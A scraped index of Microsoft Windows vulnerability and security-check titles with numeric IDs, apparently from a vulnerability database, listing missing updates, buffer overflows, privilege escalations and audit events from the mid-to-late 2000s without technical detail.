[48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [46040] Microsoft Windows Server Service RPC code execution [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26836] Microsoft Windows RPC mutual authentication spoofing [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow 